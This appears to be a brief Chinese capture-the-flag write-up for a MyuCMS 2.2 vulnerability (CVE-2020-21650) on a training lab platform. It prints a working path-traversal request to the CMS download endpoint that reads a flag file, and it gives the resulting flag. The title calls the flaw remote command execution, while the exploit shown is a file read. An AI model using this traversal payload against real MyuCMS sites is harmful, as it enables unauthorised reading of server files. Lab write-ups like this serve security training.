春秋云镜 CVE-2020-21650 MyuCMS后台rce
靶标介绍
MyuCMS开源内容管理系统,采用ThinkPHP开发而成的社区商城聚合,插件,模板,轻便快捷容易扩展 其2.2版本中admin.php/config/add方法存在任意命令执行漏洞。
启动场景
漏洞利用
exp
/index.php/bbs/index/download?url=../../../../../flag&local=1&name
http://eci-2ze00i17t48430fv10tg.cloudeci1.ichunqiu.com/index.php/bbs/index/download?url=…/…/…/…/…/flag&local=1&name
flag文件已下载
得到falg
flag{40a1922a-1dee-405b-bd48-bb4061eec5a8}